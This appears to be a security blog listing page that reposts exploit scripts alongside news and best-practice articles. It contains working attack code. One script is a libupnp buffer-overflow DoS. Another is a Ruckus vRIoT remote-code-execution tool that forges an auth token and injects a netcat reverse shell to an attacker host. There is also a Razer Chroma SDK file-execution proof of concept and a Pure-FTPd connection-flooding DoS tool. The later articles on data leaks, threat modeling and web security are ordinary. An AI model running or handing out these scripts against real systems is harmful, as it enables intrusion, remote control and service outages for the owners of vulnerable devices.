Thursday, April 25, 2024
Home Blog Page 71

libupnp 1.6.18 – Stack-based buffer overflow (DoS)Denial Of Service Exploit

By
Steven Black (n0tst3)
-
0

Date: 2020-11-27

Platform: Multiple

CVE: 2012-5958

# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958

import socket

payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"

byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))
Bookmark
ClosePlease login

Ruckus IoT Controller (Ruckus vRIoT) remote code execution

By
RiSec.Mitch
-
0

CVE: 2020-26878

Platform: Multiple

Date: 2020-11-27

# Product: Ruckus IoT Controller (Ruckus vRIoT)
# Version: <= 1.5.1.0.21
# Vendor: https://support.ruckuswireless.com/
# Vulnerability: Command Injection & Broken Authentication
# References: CVE-2020-26878
# Discovered by: Juan Manuel Fernandez
# Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
# Exploit Author: Emre SUREN
# Tested on: Appliance

#!/usr/bin/python
# -*- coding: utf-8 -*-

import requests, urllib3, sys
from Crypto.Cipher import AES
from base64 import b64encode, b64decode
from colorama import Fore
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def listen(lhost, lport):
	opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): "))
	if opt == "y":
		return True
	else:
		return False

def generatePayload(lhost, lport):

	payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #"

	return payload

def generateMagicToken():

	enc_dec_method = 'utf-8'
	salt = 'nplusServiceAuth'
	salt = salt.encode("utf8")
	str_key = 'serviceN1authent'
	str_to_enc = 'TlBMVVMx'

	return encrypt(enc_dec_method, salt, str_key, str_to_enc)

def encrypt(enc_dec_method, salt, str_key, str_to_enc):

	aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
	hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
	mret = b64encode(hx_enc).decode(enc_dec_method)

	return mret

def execCmd(rhost, rport, lhost, lport):

	payload = generatePayload(lhost, lport)
	post_data = {
	   "username": payload,
	   "password": "test"
	}
	print(Fore.BLUE + "[*] Payload\t: " + payload)

	token = generateMagicToken()
	headers = {
		"Authorization": token
	}

	rpath = "/service/v1/createUser"
	uri = 'https://' + rhost + ":" + rport + rpath

	r = requests.post(uri, json=post_data, headers=headers, verify=False)
	print(Fore.BLUE + "[*] Request sent")

	if r.status_code == 200:    
		print(Fore.GREEN + "[+] Successful. Check for the session...")
	else:
		print(Fore.RED + "[X] Failed. Check for the response...")
		print(Fore.BLUE + "[*] Response\t: " + r.text)
		sys.exit()

def main():

	if (len(sys.argv) != 5):
		print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>")
		print("[*] <RHOST> -> Target IP")
		print("[*] <RPORT> -> Target Port")
		print("[*] <LHOST> -> Attacker IP")
		print("[*] <LPORT> -> Attacker Port")
		print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0]))
		exit(0)

	rhost = sys.argv[1]
	rport = sys.argv[2]
	lhost = sys.argv[3]
	lport = sys.argv[4]

	if not listen(lhost, lport):
		print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport))
	else:
		execCmd(rhost, rport, lhost, lport)

if __name__ == "__main__":
    main()

Bookmark
ClosePlease login

16M COVID-19 Patients’ Records Exposed Online via Brazil’s Health Ministry

By
RiSec.Mitch
-
0
cybersecurity 1
cybersecurity 1

The data of Brazil President Jair Bolsonaro was among the personal and health information of 16 million COVID-19 patients in the country that were exposed online. This did not result from a hack, but after a hospital employee shared on GitHub a spreadsheet of access keys various government systems including usernames and passwords. Also included by the leak are 17 provincial governors and seven ministers.

While the spreadsheet has already been removed from GitHub, government authorities already revoked access keys and changed their system passwords to avoid further compromise.

(Photo : Andressa Anholete/Getty Images)
BRASILIA, BRAZIL – NOVEMBER 19: Jair Bolsonaro, President of Brazil, reacts during Commemorates Brazilian Flag Day amidst the coronavirus (COVID-19) pandemic at the Planalto Palace on November 19, 2020 in Brasilia. Brazil has over 5.945,000 confirmed positive cases of Coronavirus and has over 167,455 deaths.

Brazil Health Ministry Password Leak

According to ZDNet, the leak was first reported by Brazilian newspaper Estadao after a GitHub user spotted the leaked spreadsheet that was uploaded on the GitHub account of an Albert Einstein Hospital employee.  

The newspaper analyzed the data in the spreadsheet, which contains passwords to various sensitive government systems, before notifying the Sao Paolo hospital as well as the Brazilian Ministry of Health.

Among the exposed systems were Sivep-Gripe and E-SUS-VE, which are two government databases being used to store COVID-19 patients credentials. The Sivep-Gripe system is being used to keep track of hospitalized cases while the E-SUS-VE database is for recording COVID-19 patients having mild symptoms.

According to Estadao report, health information and personal data of 16 million Brazilians across 27 states stored in these two databases have been exposed for a month in GitHub’s website. These details include names, addresses, telephone numbers, individual taxpayer’s ID as well as their pre-existing medical conditions, medication regimes, and medical history.

Global health and medical app security issues

The security breach is not unique to Brazil as other countries also had leaks and vulnerabilities in their COVID-19 systems and apps. These include those used in Wales, Germany, India, and New Zealand.

In September, a study published by Intertrust analyzed 100 iOS and Android medical and healthcare apps being used by healthcare organizations across the globe. This showed that 71% of these apps show at least one high security vulnerability, which can readily exploit and result in significant loss or damage. Also, 91% of medical apps have weak or mishandled encryption, making them at high risk of intellectual property theft and data exposure.

It also shows that 28% of iOS apps and 34% of Android apps are susceptible to extraction of encryption key while about 85% of contact tracing apps for COVID-19 can leak data. Moreover, the study also found that majority of health apps have multiple security issues linked to data storage.

Intertrust Chief Technology Officer and General Manager of the Secure Systems product group Bill Horne said the healthcare and medical sectors already had history of security vulnerabilities. “The good news is that application protection strategies and technologies can help healthcare organizations bring the security of their apps up to speed,” Horne noted adding that  there are still a lot of work to be done to strengthen the data security.

Addressing Cybersecurity amid pandemic

Since cybersecurity issues are not limited to the medical sector, governments must ensure they are capable of preventing the risk of any threat and mitigating its effect. Here are three ways governments can address data leaks and security breaches.

Strengthen awareness campaigns

Educating people and increasing awareness at all levels and ages can highly reduce the risk of getting screwed up online. It is best to have unified awareness programs between the private sectors and governments.

Adjust national frameworks

Nations should be more vigilant and responsive in developing and updating national cybersecurity measures as well as regulatory and legal framework towards the cyberspace. 

Boost international cooperation

Cybersecurity is not a local issue, but a global threat to all individuals and entities. While information sharing already increased since the start of the pandemic, such trend should be maintained across all cyber-related issues.

Bookmark
ClosePlease login

3 ways governments can address cybersecurity in the post-pandemic world

By
Steven Black (n0tst3)
-
1
download 2
download 2
  • The COVID-19 pandemic has increased use of and reliance on the internet as people need to work and learn from home.
  • Cyberattacks have also increased worldwide during the crisis.
  • Governments can address cybersecurity in the post-pandemic world if they work together to adjust national frameworks, increase international cooperation and unify awareness campaigns.

The COVID-19 pandemic is accelerating digital transformation and heavier reliance on digital services. The increased adoption of telework and distance learning due to “social distancing” have led to a 50% increase in data traffic in some markets.

During the crisis, cyberattacks have increased worldwide, including against critical healthcare institutions, which have been the target of ransomware attacks. Private sector data reveals a 350% surge in phishing websites since the start of the pandemic. The United Kingdom and United States have reported that a growing number of cyber criminals and other malicious groups are exploiting the situation for their own personal gain, and cyber criminals have used stimulus packages as the subject of phishing hoaxes.

Phishing sites detected by Google, 2020
Google detected a huge increase in phishing websites since the start of the pandemic.
Image: Atlas VPN

At the same time, governments are paying more attention to digital tools and services due to their increased use. This presents an opportunity to address cyber threats and unify efforts to ensure an open, secure, trustworthy and inclusive internet that would have otherwise taken much longer.

espite the current challenges, the cyber community can work together to guarantee security, privacy and digital rights. To seize the opportunity, governments must take three specific actions.

1. Adjust national frameworks

Countries must become more agile in updating or developing national cybersecurity strategies, as well as legal and regulatory framework regarding cyberspace. These initiatives must take a multi-stakeholder approach, including paying close attention to the construction of incident response capacities in all sectors. Governments cannot act alone, and the participation of the technical community and the private sector are essential to building effective resilience capabilities.

Harmonizing legislation should also be a priority. Today, the Budapest Convention is the most global and inclusive agreement dedicated to fighting cybercrime. It has been ratified by 55 countries, with another 10 requesting accession. The Organization of American States (OAS) recommends adhesion to the Convention, and international organizations and countries should consider it a means to achieve immediate international cooperation on information sharing and cross-border investigation.

2. Increase international cooperation

Information sharing has increased since COVID-19 erupted. We need to maintain this momentum and formalize it for all cyber-related issues. Cybersecurity requires international cooperation, and there is a need to increase trust, at all levels, between countries and industries. Tomorrow, there will be a new “virus” or a “common enemy” in cyberspace; hence, collaboration at the policy, technical and law enforcement levels will be vital to protect us and allow us to work together to find solutions.

A good example of international cooperation is the regional hemispheric network CSIRTAmericas, which is a community of Computer Security Incident Response Teams (CSIRTs) in the Western Hemisphere. During crises such as Wannacry and the COVID-19 pandemic, this community has been able to reunite virtually to share real-time information and exchange knowledge and information to address regional challenges.

3. Unify awareness campaigns

Educate, educate, educate.

No one is immune to a cyber incident or one “bad click.” We must increase awareness at all ages and levels, regardless of industry. In particular, it is of utmost importance to start teaching children about cybersecurity. In this era of rapid technological advancement, children need to immerse themselves in technology at a young age in order to learn the skills they will need throughout their lives. They must be empowered to make the most out of this opportunity, while also staying protected and aware of their risks.

Governments and the private sector should join together to work toward unified awareness campaigns. Initiatives such as “Stop. Think. Connect.” could serve a model for other efforts. Furthermore, users should never be the last line of defense in cybersecurity, as they need to play a role in educating each other and amplifying the reach of awareness campaigns. Cybersecurity is a shared responsibility.

We also need to push a gender-inclusive approach to cyber issues. The Inter-American Commission of Women of the OAS have already recognized differential impacts of COVID-19 on women’s lives, including the increase in violence against women and girls on the internet. Moreover, women are bearing a significant burden of the pandemic’s economic impact, particularly in terms of employment. This makes the case for mainstreaming gender considerations in cybersecurity policies as well as employment options.

As the COVID-19 pandemic accelerates digital transformation, it is essential that countries take a cognizant look at their cyber posture and implement concrete measures to promote a more reliable and trustworthy internet. These three strategic actions should be taken as initial steps towards building a stronger level of digital trust and enabling a robust cybersecurity environment in a post-pandemic world.

Bookmark
ClosePlease login

Razer Chroma SDK Server 3.16.02 – Race Condition Remote File Execution

By
Steven Black (n0tst3)
-
0

CVE: 2020-16602

Platform: WIN

Date: 2020-11-26

Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution
Exploit Author: Loke Hui Yi
Vendor Homepage: https://razerid.razer.com
Software Link: http://rzr.to/synapse-3-pc-download
Version: <= v3.12.17
Tested on: Windows 10
CVE: CVE-2020-16602

# More info can be found here: 
# https://www.angelystor.com/2020/09/cve-2020-16602-remote-file-execution-on.html
# https://www.youtube.com/watch?v=fkESBVhIdIA

# Remote attackers can register applications to the Chroma Server. If the attacker has write access to the ProgramData folder where the Chroma Server stores its data, he can exploit a race condition and get the server to execute a binary of his choosing.

# The code below registers an application to the Chroma Server using a name of the attacker's choosing. 

# The attacker will need to pre-create a folder with the same name as the application to be registered in Razer Chroma SDK\Apps\<appname>, and create an exe file with the same application's name in that folder. The Apps folder is user writable and does not require admin privileges.

# The attacker can keep running the code below to get the Server to execute the file while writing  the payload to the target directory with another process (eg samba or ftp) in order to exploit the race condition.

import requests
import json


def heartbeat(uri):
    print(uri + '/heartbeat')
    r = requests.put(uri + '/heartbeat', verify=False)
    print(r.text)

def keyboard(uri):
    data = {
        "effect":"CHROMA_CUSTOM_KEY",
        "param":{
            "color":[
                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535]
            ],
            "key":[
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, (16777216 | ~255), (16777216 | ~255), (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), (16777216 | ~16776960), (16777216 | ~16776960), 0, 0, 0, 0]
            ]
        }
    }
    print(uri + '/keyboard')
    r = requests.put(uri + '/keyboard', json=data, verify=False)
    print(r.text)

text="a"

for x in range(20000):
    text += "a"

pload = {
    "title": "APPNAME",
    "description": "description",
    "author": {
        "name": "name",
        "contact": "contact"
    },
    "device_supported": [
        "keyboard",
        "mouse",
        "headset",
        "mousepad",
        "keypad",
        "chromalink"],
    "category": "application"
}
server = 'https://chromasdk.io:54236/razer/chromasdk'
r = requests.post(server, json=pload, verify=False)

json_data = json.loads(r.text)

print(json_data)
uri = json_data['uri']

heartbeat(uri)

#uri = 'https://chromasdk.io:54236/sid=58487'
heartbeat(uri)

keyboard(uri)


print (json_data['sessionid'])

do_heartbeat = False

if do_heartbeat:
    sid = 1
    uri = 'https://chromasdk.io:54236/sid=' + sid
    heartbeat(uri)

# PoC loop.py for race test
'''
import requests

def copyfile(src, dst):
    with open(src, 'rb') as fsrc:
        with open(dst, 'wb') as fdst:
            content = fsrc.read()
            fdst.write(content)

while True:
    try:
        print("copying")
        copyfile('pwn.exe', 'C:\\ProgramData\\Razer Chroma SDK\\Apps\\pwn\\pwn.exe')
    except Exception as e:
        print(str(e))
'''
Bookmark
ClosePlease login

Pure-FTPd 1.0.48 – Remote Denial of Service

By
RiSec.Mitch
-
0

CVE: N/A

Platform: Multiple

Date: 2020-11-26

tested

# Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service
# Date: 2020. nov. 26., 09:32:17 CET
# Exploit Author: xynmaps
# Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/
# Software Link: https://github.com/jedisct1/pure-ftpd/
# Version: 1.0.48
# Tested on: Parrot Security OS 5.9.0

#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3.
"""
Pure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""

import socket
import sys
import threading
import subprocess
import time

banner = """
._________________.
|    Pure-FTPd    |
|      D o S      |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|

"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])

def test(t,p):
	s = socket.socket()
	s.settimeout(10)
	try:
		s.connect((t, p))
		response = s.recv(65535)
		s.close()
		return 0
	except socket.error:
		print("Port {} is not open, please specify a port that is open.".format(p))
		sys.exit()
def attack(targ, po, id):
	try:
		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
		#print("Worker {} running".format(id))
	except OSError: pass
def main():
	global target, port, start
	print banner
	try:
		target = sys.argv[1]
	except:
		print usage
		sys.exit()
	try:
		port = int(sys.argv[2])
	except:
		port = 21
	try:
		conns = int(sys.argv[3])
	except:
		conns = 50
	print("[!] Testing if {0}:{1} is open".format(target, port))
	test(target, port)
	print("[+] Port {} open, starting attack...".format(port))
	time.sleep(2)
	print("[+] Attack started on {0}:{1}!".format(target, port))
	def loop(target, port, conns):
		global start
		threading.Thread(target=timer).start()
		while 1:
			for i in range(1, conns + 3):
				t = threading.Thread(target=attack, args=(target,port,i,))
				t.start()
				if i > conns + 2:
					t.join()
					break
					loop()

	t = threading.Thread(target=loop, args=(target, port, conns,))
	t.start()

def timer():
        start = time.time()
        while 1:
                if start < time.time() + float(900): pass
                else:
                        subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                        t = threading.Thread(target=loop, args=(target, port,))
			t.start()
                        break

main()
Bookmark
ClosePlease login

Sophos notifies customers of data exposure after database misconfiguration

By
RiSec.Mitch
-
0
sophos
sophos

UK-based cyber-security vendor Sophos is currently notifying customers via email about a security breach the company suffered earlier this week.

“On November 24, 2020, Sophos was advised of an access permission issue in a tool used to store information on customers who have contacted Sophos Support,” the company said in an email sent to customers and obtained by ZDNet.

Exposed information included details such as customer first and last names, email addresses, and phone numbers (if provided).

A Sophos spokesperson confirmed the emails earlier today and told ZDNet that only a “small subset” of the company’s customers were affected but did not provide an approximate number.

Sophos said it learned of the misconfiguration from a security researcher and fixed the reported issue right away.

“At Sophos, customer privacy and security are always our top priority. We are contacting all affected customers,” the company said. “Additionally, we are implementing additional measures to ensure access permission settings are continuously secure. “

This is the second major security incident Sophos has dealt with this year. In April, a cybercrime group discovered and abused a zero-day in the Sophos XG firewall to breach companies across the world. The attackers deployed the Asnarok trojan, and once the zero-day was publicly disclosed, they attempted to deploy ransomware — but eventually failed.

article origin: https://www.zdnet.com/article/sophos-notifies-customers-of-data-exposure-after-database-misconfiguration/

Bookmark
ClosePlease login

7 Web Application Security Best Practices You Need to Know

By
Steven Black (n0tst3)
-
0
cyber security 1
cyber security 1

Web app security is not something that you can bolt on after developing your app, it should be a core part of the app development process. Web applications are by design, available to others and are very much exposed to many potential threats. As such, you need to ingrain security features within each component of your app and make security a part of each phase of the software development lifecycle to ensure that it is safe from threats.

There are several web application security best practices that you can follow to achieve this. These web application security best practices ensure that there are multiple layers of security incorporated in your app and development and testing processes.

In this post, we will list seven of the most important web application security best practices that you should follow to protect your apps from threats. So, let’s take a look at these app security best practices and why they are important.

1. Provide Application Security Training at All Levels

The first and most important step in ensuring web application security is to provide all software development personnel security training. It should not just be limited to app developers, but are related personnel involved in the process, such as Quality Assurance, Project Management, and operational staff. Training all disciplines associated with the development lifecycle helps to build a culture of security within the organization.  Having trained personnel who understand the core security concepts associated with web application security lays the foundation for your security program.

2. Use Threat Modeling to Identify Threats and Vulnerabilities

One of the most important web application security best practices is to make threat models to identify threats. It allows you to look at all possible information assets that could be targeted and how they may be vulnerable and targeted by an attacker.   This process is not done just once but repeated as changes are made to the application and the threat model should be constantly updated to capture new and emerging threats.  The threat model will evolve over time and will mature as more people give it critical thought.  This not only helps develop a good model but also serves to keep base security knowledge and concepts on the front mind of the entire team.

When creating a threat model, you must:

Identify all Information Assets

To prepare a threat model, you need to first identify all information assets (data) that may be targeted. You should hopefully already have identified sensitive data and categorized it with data classification levels.  Within your application, you should know what data classification levels your application is working with, what that data is so that you can ensure that proper mechanisms are used to protect that data.

Identify and Define Possible Threats

Once you have identified critical data held within your application, you may start to consider the threats to this.  This may be done in two manners, top-down or bottom-up.  Bottom-up is more typically associated with how an actual attacker will work, they will probe the systems and find weaknesses and exploit and pivot until they get to the desired data.  Top-down looks initially at the target and then looks to how someone may get access to it.

You may use either approach and sometimes it is helpful to use both to get different perspectives on the application’s threats.

Often times it is helpful to make use of some attack libraries (e.g., Mitre’s CAPEC) or vulnerability lists such as OWASP Top 10 to help seed the threat modeling effort.

Prioritize Vulnerabilities and Risks

Once you have developed and validated your threat model, you should assign priorities and risk values based on their impact and the probability of occurrence.

This may seem trivial but it is important.  Every organization has limited resources and an efficient organization needs to wisely expend its resources to achieve the desired end state.  Here, to reduce risk to the application, vulnerabilities, and threats must be based upon actual risk rather than what happens to pop up and is of interest this week.

3. Prepare a Web Application Security Architecture

Your development team will be focused on the rapid development and deployment of functionality.  To make sure that this is secured, you have to develop a security architecture that makes it easy for them to develop and deploy secure code.   This means that you have to have simple authentication and centralized authorization that ensures all requests (application, service requests, etc) are authorized vertically and horizontally without developers having to jump through hurdles to perform these critical security functions.  You have to have your architecture use a data access framework that makes it impossible to open up a SQL injection vulnerability.  You have to ensure that any untrusted data is being encoded prior to being sent to a browser.  In short, ideally, your security architecture should make it trivial for your development team to develop code without opening any of the most common vulnerabilities such as found in the OWASP Top 10.

Your architecture should also plan for failure.  Have mechanisms to alert on failure and limit the blast radius so that a single failure does not lead to catastrophic breaches.  Multiple layered security controls help to enable this along with using numerous restricted least privilege accounts can help facilitate this.

Other web application security best practices that allow you to create a strong security architecture are:

-Keep a centralized structure where all authorization requests go through a central authority. -Ensure all security events are logged in a manner that they cannot be tampered with and that all security events are monitored to detect malicious behavior -Ensure all data is protected in accordance with appropriate standards for its classification levels (e.g., passwords, tokens, and other sensitive information are never transmitted or stored in clear text) -Use strong encryption algorithms such as AES and use strong key management controls (e.g, hardware security module or other appropriate key management tools)

4. Perform Regular Application Testing

Another effective web application security best practice is to regularly test your app for vulnerabilities throughout the development lifecycle.

Automated Dynamic Application Security Testing (DAST) and Static Application Security Testing (SAST) tools should be used throughout the development lifecycle.  Each has their own strengths and weaknesses but by combining their use, you get early issue identification that allows for rapid and cheaper fixes.  By integrating these into your lifecycle, you get the additional benefit of maintaining a higher level of security awareness.

HOWEVER, be very careful to ensure that these tools do not flood your development teams with false positives.  If they do, the tools will be routinely ignored.  Ideally, you should have these tools integrate with your own issue tracking systems so that developers stay within their own normal workflow and security issues are identified and put in their normal work queue.  Cypress Defense has extensive experience developing and integrating these tools into CI/CD pipelines for development teams so can assist with this if needed.

perform regular application testing

5. Use Real-Time Monitoring and Protection

As the old saying goes, “there are those that have been breached and know it and those that don’t know that they have been breached”. Organizations cannot depend upon preventative measures alone, but instead, need to have strong detection and response capabilities as well.  The use of Web Application Firewalls (WAFs) along with detailed security logging integrated into robust SIEM (Security Information and Event Management) tools help you detect unusual activity that may require further attention.  In many organizations, there is a disconnect between the operational side of the team and the development side, in which case, it may benefit your application to have your application be more attack aware (see below).

6. Develop Attack-Aware Applications

This web application security best practice takes your app security to the next level by providing immediate incident detection and response.

For this, you need to develop attack-aware apps that can detect intrusions or unusual activity immediately and either notify the security operations center (SOC) or take automated action.  Many times developers are more knowledgeable of what standard behavior is and have more capabilities to detect malicious behavior.  A standard user story for teams should be to detect malicious behavior.

The benefit of such apps is that intrusions or malicious actions are detected in real-time, which allows you to take immediate action. Apps can also be designed to take automated response actions like logging out the user and notifying the admin.

Similar to firewalls, this is an additional layer of security and is not meant to be the only security measure in place. This needs to be over and above an already securely-designed web application.

7. Run Applications with Few Privileges

Every web application provides some privileges to users on remote and local computers. As a web application security best practice, you should run apps on as few privileges as possible.  As mentioned previously, it is preferred to plan on failure and use multiple least privilege accounts to limit the blast radius for when a failure does occur.   Whenever privileged access is required, ensure that very strong authentication controls are established (e.g, multi-factor authentication only from internal network) and thorough auditing is in place.

Conclusion

Ensuring app security is a dynamic and ongoing process. Even after following all of the app security best practices above, you cannot afford to be complacent. You need to keep monitoring your app for security threats and improving your security measures.

The web application security best practices mentioned here provide a solid base for developing and running a secure web application. However, you still need to be vigilant and explore all other ways to secure your apps.

Bookmark
ClosePlease login

How to Perform Threat Modeling & Security Analysis in 5 Steps

By
Steven Black (n0tst3)
-
0
infosec news
infosec news

Want to learn how to perform threat modeling?

Then, you are in the right place.

But before that, let us quickly discuss why it is important to perform threat modeling and security analysis.

Almost all software systems face a variety of threats today, and the number of cyberattacks continues to rise as the technology matures. In the second quarter of 2018, malware exploiting software vulnerabilities grew 151 percent, according to a report.

Security breaches can occur due to internal or external entities, and they can have devastating consequences. These attacks may leak sensitive data of your organization or disable your system completely, which may even lead to complete loss of data.

How can you protect your data from being stolen or prevent malicious attacks on your devices?

One way to start is by performing threat modeling, a process that helps you analyze your environment, identify potential vulnerabilities and threats, and create the proper security requirements you need to address those threats.

What is the Right Level of Security for Your Device and How Can Threat Modeling Help You Achieve It?

To design-in security, it is recommended that developers and manufacturers analyze the operating environment to determine how each device could be attacked and then document it.

This process of understanding and documenting security requirements is known as Threat Modeling and Security Analysis (TMSA).

But how can performing Threat Modeling and Security Analysis help you secure your device against cybersecurity attacks?

It can help you analyze your device and understand:

  • How robust does your security need to be?
  • What preventive measures should you take to avoid security issues?
  • What potential threats could impact your device?

A Threat Modeling and Security Analysis (TMSA) highlights critical issues and challenges that you should consider while implementing security to protect your product or device.

It prompts you to consider critical questions such as:

  • What are the potential threats to your device?
  • How severe are those threats?
  • Is your device in compliance with security standards?
  • What are the potential vulnerabilities that could put your device at risk of a security breach?
  • What countermeasures could you implement to protect your device?

Steps to Perform Threat Modeling

Here is a step-by-step process that will help you understand how you can perform a Threat Modeling and Security Analysis to determine your security requirements.

Step 1: Identify the Use Case, Assets to Protect, and External Entities

The first step to perform threat modeling is to identify a use case, which is the system or device that is the subject of your security assessment. By doing so, you will have an idea of what device or system needs to be analyzed further.

Since attackers may target your device to steal important data or to have it act maliciously, you need to identify the assets that hold sensitive information or are most likely to be attacked.

For instance, if you have a smart speaker, then you may want to protect the following assets:

  • Log-in credentials
  • Network communication
  • Firmware
  • Event logs
  • Certificates and unique keys
  • System configurations (to secure your IP address)
  • Device resources (such as speakers, microphone array, battery, storage, debug interface, network bandwidth, and computing power)

There might be many different assets in your device, but what’s important is that you focus on securing assets that hold valuable data and are critical to your organization and customers.

Moreover, to identify and understand potential threats that might impact your device, you need to determine external entities and users who interact with the device.

That may include legitimate users, such as the virtual system administrator or the owner of the device. But it should also extend to identify potential adversaries or attackers attempting to gain access to the device.

Once you’ve identified these, it’s time to move on to the next step of performing threat modeling.

Step 2: Identify Trust Zones, Potential Adversaries, and Threats

In this step of performing threat modeling, you have to identify trust zones and corresponding entry-exit points. By using this information, you can develop data flow diagrams along with privilege boundaries that will help you define the approach for input data validation, user authentication, and error handling.

Additionally, you need to create an adversary-based threat model to help you identify potential adversaries and attackers who may be trying to exploit or attack your device.

Usually, an adversary-based threat model has four categories of attackers:

  • Network attacker: This type of attacker may conduct network attacks such as man-in-the-middle attacks, where the attacker intercepts communication between two parties.
  • Malicious insider attacker: These attackers may be your employees, a third-party vendor, or any individual who has access to your device or network.
  • Remote software attacker: Most attackers fall into this category and try to breach security software by introducing malicious scripts/code or a virus to steal data or gain control of the device/network.
  • Advanced hardware attacker: These attackers usually have advanced resources and require physical access to the device. They often deploy sophisticated attacks with the help of specialized equipment, such as microscopy probing or ion-beam lithography.

By this point, you should have identified what you need to protect and what potential adversaries could lead to a security breach.

Next, you should identify potential vulnerabilities, including software, physical devices, development lifecycles, and communication that could act as entry points into your device and allow attackers to enter your system.

What do these vulnerabilities include?

These vulnerabilities may include excessive user access privileges, weak password policies, absence of Web Application Firewall (WAF), broken authentication, insecure cryptographic storage, lack of security guidelines, or security misconfigurations.

Once you have identified potential vulnerabilities, you can implement a threat model against each entry point to determine security threats.

But how can you design the right level of security required to protect your device against these threats?

After identifying potential security threats, you will need to consider assessing the severity of each threat or attack and allocate your resources appropriately.

You can use a common vulnerability scoring system (CVSS) to evaluate the impact of the threats. It uses scores between zero to 10 to help you understand how an attack would affect your device.

For instance, if the CVSS score for a threat is 9, then you should focus your resources and attention on it as its impact would be severe.

By doing so, you will be able to build the right level of security into your device.

Step 3: Determine High-Level Security Objectives to Address Potential Threats

In this step of how to perform threat modeling, you have to establish security objectives that focus on maintaining the following security elements:

  • Confidentiality
  • Availability
  • Integrity
  • Secure Development Lifecycle
  • Authenticity
  • Non-Repudiation

The type of attack determines the risk to each of these security elements.

For instance, you can determine that a tampering attack may impact the integrity of your device, while a spoofing attack may impact the authenticity of your device.

Once you have assessed the potential threats and their severity, you will be able to determine what countermeasures you need to employ to combat those threats and how you can address them appropriately.

Step 4: Define Security Requirements for Each Security Objective Clearly

Since each threat poses a different risk to high-level security objectives, you need to analyze and create specific, actionable security requirements that will directly address those threats.

For instance, to secure identities, you should:

  • Maintain roles, trusted communication channels, and authorization
  • Implement least privilege user access
  • Set failure threshold limits
  • Secure remote management

Step 5: Create a Document to Store All Relevant Information

Once you have gathered all the requisite information needed to set security requirements for your system, create a threat modeling document that stores this information accurately.

What should you include in this document?

The document should include separate tables that list the assets that you need to protect, potential adversaries and threats, countermeasures you need to take, and security requirements.

It should be well-structured and have clear and concise information to help you see the potential severity of an attack and how you can address each threat.

A well-maintained document can help you efficiently perform Threat Modeling and Security Analysis (TMSA).

Key Takeaways from This Guide on How to Perform Threat Modeling

Remember, you need to identify potential vulnerabilities along with security requirements that will help protect your system against attackers and threats.

